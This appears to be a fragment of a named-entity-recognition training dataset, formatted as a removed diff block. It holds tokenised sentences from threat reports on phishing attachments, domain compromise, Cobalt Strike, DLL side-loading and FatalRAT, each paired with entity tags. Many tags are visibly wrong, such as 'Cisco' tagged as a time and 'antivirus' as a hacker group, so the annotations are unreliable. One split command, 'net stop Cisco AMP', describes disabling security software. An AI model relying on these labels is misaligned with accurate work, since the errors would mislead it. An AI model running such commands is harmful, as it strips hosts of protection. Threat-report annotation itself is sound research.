"O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "execute", - "a", - "payload", - "via", - "SMB", - "and", - "Windows", - "Service", - "Creation,", - "respectively,", - "on", - "a", - "target", - "DC." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "execute", - "a", - "payload", - "via", - "Windows", - "Service", - "Creation", - "on", - "target", - "workstations", - "and", - "the", - "DC." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "team", - "used", - "the", - "organization’s", - "MDM", - "system", - "to", - "gain", - "root", - "access", - "to", - "machines", - "across", - "the", - "organization’s", - "network", - "without", - "being", - "detected." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "krbtgt", - "account", - "is", - "a", - "domain", - "default", - "account" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Use", - "of", - "non-secure", - "default", - "configurations" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "organization", - "used", - "default", - "configurations", - "for", - "hosts", - "with", - "Windows", - "Server", - "2012", - "R2." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "default", - "configuration", - "allows", - "unprivileged", - "users", - "to", - "query", - "group", - "membership", - "of", - "local", - "administrator", - "groups" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "red", - "team", - "used", - "and", - "identified", - "several", - "standard", - "user", - "accounts", - "with", - "administrative", - "access", - "from", - "a", - "Windows", - "Server", - "2012", - "R2", - "SharePoint", - "server." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "team", - "discovered", - "several", - "standard", - "user", - "accounts", - "that", - "have", - "local", - "administrator", - "access", - "to", - "critical", - "servers." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "misconfiguration", - "allowed", - "the", - "team", - "to", - "use", - "the", - "low-level", - "access", - "of", - "a", - "phished", - "user", - "to", - "move", - "laterally", - "to", - "an", - "Unconstrained", - "Delegation", - "host", - "and", - "compromise", - "the", - "entire", - "domain." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "If", - "a", - "user", - "with", - "administrative", - "access", - "is", - "compromised,", - "an", - "actor", - "can", - "access", - "servers", - "without", - "needing", - "to", - "elevate", - "privileges" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "workstations", - "allowed", - "unprivileged", - "accounts", - "to", - "have", - "local", - "administrator", - "access" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "keylogged", - "a", - "user", - "during", - "a", - "mandatory", - "password", - "change" - ], - "ner_tags": [ - "B-SamFile", - "B-Purp", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "spear", - "phishing", - "attachments." - ], - "ner_tags": [ - "I-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "spear", - "phishing", - "attachments", - "for", - "Initial", - "Access" - ], - "ner_tags": [ - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "As", - "attackers", - "can", - "quickly", - "change", - "spear", - "phishing", - "attachments" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "suspicious", - "email", - "attachments", - "or", - "other", - "phishing", - "techniques." - ], - "ner_tags": [ - "O", - "I-Way", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "modification", - "of", - "Registry", - "Keys/Startup", - "folder", - "for", - "persistence" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Using", - "valid", - "accounts" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "valid", - "accounts" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "protocols,", - "such", - "as", - "for", - "Remote", - "Desktop", - "Protocol" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool" - ] - }, - { - "tokens": [ - "used", - "to", - "download", - "files…" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "second", - "stage", - "payload,", - "which", - "was", - "later", - "determined", - "to", - "likely", - "be", - "the", - "penetration", - "testing", - "framework", - "\"Brute", - "Ratel,\"", - "was", - "then", - "downloaded", - "via", - "a", - "connection" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "“RClone”", - "was", - "downloaded", - "on", - "the", - "file", - "servers" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "which", - "allowed", - "the", - "threat", - "actor", - "to", - "move", - "freely", - "between", - "domains." - ], - "ner_tags": [ - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Two", - "\".bat\"", - "files", - "were", - "sent", - "throughout", - "the", - "organization." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "before", - "running", - "the", - "\".cmd\"", - "file", - "contained", - "within", - "the", - "ISO." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "this", - "CMD", - "file", - "calls", - "the", - "\"db\"", - "file.", - "In", - "both", - "samples," - ], - "ner_tags": [ - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - ".bat", - "files" - ], - "ner_tags": [ - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "USING", - "\".BAT\"", - "FILES" - ], - "ner_tags": [ - "B-Way", - "B-Way", - "B-Way" - ] - }, - { - "tokens": [ - "The", - "two", - "\".bat\"", - "files", - "that", - "were", - "sent" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cc.bat", - "is", - "a", - "simple", - "script" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "w.bat", - "as", - "viewed", - "through", - "the", - "bash", - "command", - "\"cat\":" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "these", - "are", - "the", - "same", - "commands", - "as", - "observed", - "in", - "the", - "\".bat\"", - "files:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Both", - "were", - "designed", - "to", - "turn", - "off", - "antivirus", - "and", - "anti-malware", - "software." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "B-HackOrg", - "O" - ] - }, - { - "tokens": [ - ".bat", - "files", - "designed", - "to", - "disable", - "Cisco", - "AMP", - "/", - "Microsoft", - "Defender" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "command", - "\"net", - "stop", - "Cisco", - "AMP\"." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Time", - "O" - ] - }, - { - "tokens": [ - "showing", - "the", - "“uninstall”", - "commands", - "for", - "Windows", - "Defender:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "DISABLING", - "ANTIVIRUS/MALWARE", - "SOFTWARE", - "USING", - "\".BAT\"", - "FILES" - ], - "ner_tags": [ - "B-Way", - "B-Way", - "B-SecTeam", - "B-SecTeam", - "B-Way", - "B-Way" - ] - }, - { - "tokens": [ - "were", - "both", - "designed", - "to", - "turn", - "off", - "Antivirus", - "and", - "Antimalware", - "software." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "designed", - "to", - "stop", - "Cisco", - "AMP." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stopping", - "Cisco", - "AMP", - "/", - "Disabling", - "Microsoft", - "Defender" - ], - "ner_tags": [ - "O", - "B-Time", - "O", - "O", - "O", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "From", - "the", - "two", - "phishing", - "emails,", - "both", - "attachments", - "contain", - "similar", - "malware." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "phishing", - "attachment", - "was", - "submitted", - "to", - "the", - "target", - "in", - "a", - "response", - "to", - "an", - "ongoing", - "conversation" - ], - "ner_tags": [ - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "When", - "downloaded,", - "the", - "initial", - "attachment", - "is", - "a", - "local", - "HTML", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "were", - "able", - "to", - "be", - "decrypted", - "by", - "leveraging", - "the", - "decryption", - "script" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "adds", - "itself", - "to", - "a", - "scheduled", - "task." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "emulated", - "C2", - "Server", - "is", - "now", - "running", - "an", - "HTTPS", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "shows", - "that", - "this", - "connection", - "was", - "likely", - "HTTPS" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "the", - "communication", - "is", - "consistent", - "with", - "HTTP/S", - "traffic." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "on", - "TCP", - "port", - "2222." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "most", - "of", - "the", - "connection", - "attempts", - "to", - "the", - "C2", - "IP’s", - "are", - "conducted", - "over", - "TCP", - "port", - "443." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Due", - "to", - "TCP", - "port", - "2222’s", - "common", - "use", - "as", - "an", - "alternate", - "port", - "for", - "SSH", - "communication,", - "the", - "Malware", - "Analyst", - "recorded", - "a", - "manual", - "SSH", - "connection", - "to", - "the", - "emulated", - "C2", - "host" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "some", - "data", - "exfiltration", - "or", - "interaction", - "with", - "the", - "downloaded", - "second", - "stage", - "from", - "the", - "C2." - ], - "ner_tags": [ - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "show", - "the", - "transfer", - "of", - "files", - "using", - "SMB." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Files", - "commonly", - "observed", - "transferred", - "via", - "SMB", - "include" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Showing", - "the", - "Transfer", - "of", - "Cobalt", - "Strike", - "Beacons", - "using", - "RDPClip:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "allows", - "for", - "lateral", - "movement", - "leveraging", - "RPC", - "to", - "create", - "SMB", - "traffic." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "indicating", - "the", - "use", - "of", - "Remote", - "Desktop", - "Protocol.[" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Showing", - "the", - "Transfer", - "of", - "Cobalt", - "Strike", - "Beacons", - "using", - "RDPClip:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "the", - "use", - "of", - "RDP", - "by", - "the", - "Threat", - "Actor" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "second", - "encoded", - "Base64", - "string", - "was", - "not", - "only", - "base64", - "but", - "also", - "Gziped", - "for", - "size", - "and", - "obfuscation." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "has", - "some", - "simple", - "but", - "clever", - "obfuscation", - "in", - "place." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "shows", - "the", - "decoded", - "and", - "uncompressed", - "data." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "payload", - "decoder", - "from", - "Github" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "to", - "decode", - "the", - "body" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Task", - "manager", - "was", - "then", - "use", - "to", - "reveal", - "the", - "service", - "running", - "on", - "PID", - "3488," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg" - ] - }, - { - "tokens": [ - "requests", - "using", - "RC4", - "encryption" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "was", - "abused", - "by", - "the", - "attacker", - "to", - "steal", - "client", - "data." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "copied", - "itself", - "to", - "\"$CURRENTUSER\\AppData\\Roaming\\Microsoft\\Isoaahffo\\djkuuhd.dll,\"", - "as", - "confirmed", - "by", - "the", - "file's", - "hashes", - "shown", - "below,", - "and", - "sets", - "itself", - "to", - "auto", - "run." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "process", - "imbedded", - "itself", - "into", - "wermgr.exe,", - "the", - "Windows", - "Error", - "Reporting", - "Manager", - "(Process", - "ID", - "6660)." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "uses", - "a", - "mixture", - "of", - "disguising", - "the", - "ASCII", - "as", - "UTF-16", - "via", - "manipulating", - "the", - "start", - "of", - "the", - "file,", - "as", - "well", - "as", - "obfuscating", - "the", - "data", - "using", - "a", - "simple", - "cypher." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "running", - "the", - "malware", - "sets", - "itself", - "up", - "as", - "the", - "service" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "after", - "reaching", - "the", - "local", - "DC,", - "the", - "attacker", - "was", - "able", - "to", - "gain", - "a", - "better", - "lay", - "of", - "the", - "land", - "and", - "observe", - "the", - "presence", - "of", - "the", - "other", - "two", - "domains." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "technique", - "leveraging", - "the", - "Windows", - "Management", - "Instrumentation", - "(WMI)", - "service", - "to", - "execute", - "malicious", - "code." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "indicating", - "that", - "the", - "user", - "deleted", - "the", - "collected", - "data." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "group", - "utilizes", - "sideloading" - ], - "ner_tags": [ - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "DLL", - "for", - "sideloading" - ], - "ner_tags": [ - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "group", - "uses", - "DLL", - "sideloading" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "detect", - "and", - "remove", - "Alibaba", - "Cloud", - "Security", - "from", - "compromised", - "instances" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "relied", - "on", - "their", - "victims", - "to", - "execute", - "the", - "malicious", - "MSI", - "installers" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "cmd.exe", - "to", - "download", - "files", - "from", - "Alibaba", - "Cloud", - "Object", - "Storage", - "Service." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executes", - "OSSUTIL", - "(included", - "in", - "the", - "installer", - "package", - "as", - "ssu.exe)", - "to", - "download", - "files" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "use", - "API", - "calls", - "such", - "as", - "VirtualAlloc", - "to", - "load", - "and", - "execute", - "malicious", - "components", - "into", - "memory" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Features", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "invokes", - "the", - "Windows", - "API", - "function", - "DisableThreadLibraryCalls" - ], - "ner_tags": [ - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "create", - "scheduled", - "tasks", - "to", - "achieve", - "persistence" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Create", - "scheduled", - "tasks", - "to", - "execute", - "the", - "loader", - "and", - "updater", - "components" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "scheduled", - "tasks", - "created", - "for", - "the", - "updater," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "four", - "scheduled", - "tasks", - "are", - "created:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creates", - "a", - "registry", - "Run", - "key", - "to", - "achieve", - "persistence" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "use", - "various", - "encryption", - "algorithms", - "to", - "hide", - "payloads", - "and", - "strings." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "execute", - "an", - "encrypted", - "payload", - "located", - "in", - "the", - "embedded", - "DLL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "contains", - "an", - "XOR-encrypted", - "payload,", - "divided", - "into", - "three", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "with", - "a", - "different,", - "single", - "byte", - "XOR", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "use", - "dynamic", - "API", - "resolution", - "to", - "avoid", - "detection." - ], - "ner_tags": [ - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "calling", - "an", - "export", - "function", - "of", - "the", - "DLL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "reconstructs", - "the", - "imports", - "table", - "of", - "the", - "DLL", - "and", - "calls", - "the", - "DllEntryPoint," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "the", - "DLL", - "will", - "find", - "the", - "address", - "of", - "an", - "export", - "function", - "called", - "SVP7,", - "which", - "contains", - "the", - "entry", - "point", - "of", - "the", - "malware," - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "DLL", - "side-loading", - "to", - "execute", - "their", - "malicious", - "payloads" - ], - "ner_tags": [ - "O", - "B-Way", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "side-loading", - "a", - "malicious", - "DLL,", - "libpng13.dll" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "B-SamFile" - ] - }, - { - "tokens": [ - "by", - "side-loading", - "dr.dll,", - "used", - "by", - "a", - "legitimate,", - "signed", - "binary" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - ",", - "side-loaded", - "by", - "the", - "same", - "legitimate", - "executable" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "contains", - "shellcode", - "and", - "an", - "embedded", - "DLL", - "file", - "that", - "loads", - "FatalRAT" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "contains", - "an", - "embedded", - "DLL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "execute", - "an", - "encrypted", - "payload", - "located", - "in", - "the", - "embedded", - "DLL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "has", - "keylogger", - "functionalities" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Capture", - "keystrokes" - ], - "ner_tags": [ - "B-Way", - "O" - ] - }, - { - "tokens": [ - "encrypts", - "data", - "with", - "a", - "custom", - "encryption", - "algorithm", - "before", - "it", - "is", - "sent", - "to", - "the", - "C&C", - "server." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "TCP", - "for", - "C&C", - "communications." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "exfiltrates", - "data", - "over", - "the", - "same", - "channel", - "used", - "for", - "C&C" - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Drop", - "a", - "file", - "named", - "ossutilconfig", - "in", - "the", - "%USERPROFILE%", - "directory" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Drop", - "and", - "execute", - "the", - "legitimate", - "installer", - "in", - "C:\\Program", - "Files\\Common", - "Files", - "(see", - "CommonFiles64Folder)." - ], - "ner_tags": [ - "B-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "by", - "side-loading", - "dr.dll,", - "used", - "by", - "a", - "legitimate,", - "signed", - "binary" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "original", - "libpng13.dll", - "is", - "also", - "included", - "in", - "the", - "installer", - "package", - "(renamed", - "to", - "what", - "appears", - "to", - "be", - "a", - "random", - "name)", - "because", - "the", - "malicious", - "DLL", - "forwards", - "its", - "exported", - "functions", - "to", - "the", - "original", - "DLL." - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "download", - "files", - "from", - "an", - "attacker-controlled", - "bucket", - "in", - "Alibaba", - "Cloud" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "download", - "and", - "execute", - "further", - "shellcode" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obfuscated", - "the", - "loader", - "with", - "many", - "calls", - "to", - "a", - "function", - "that", - "just", - "prints", - "some", - "hardcoded", - "values" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "decrypt," - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "decrypts", - "the", - "payload", - "is", - "the", - "same", - "as", - "the", - "function", - "used", - "in", - "FatalRAT", - "to", - "decrypt", - "its", - "configuration" - ], - "ner_tags": [ - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypt", - "its", - "configuration", - "strings" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "decompiled", - "code", - "used", - "to", - "decrypt", - "strings" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decompiled", - "code", - "of", - "a", - "function", - "used", - "by", - "a", - "FatalRAT" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "using", - "a", - "variety", - "of", - "software", - "packers" - ], - "ner_tags": [ - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "I-Tool" - ] - }, - { - "tokens": [ - "one", - "Zip", - "contained", - "a", - "benign", - "file", - "named", - "screenshot1242.jpeg", - 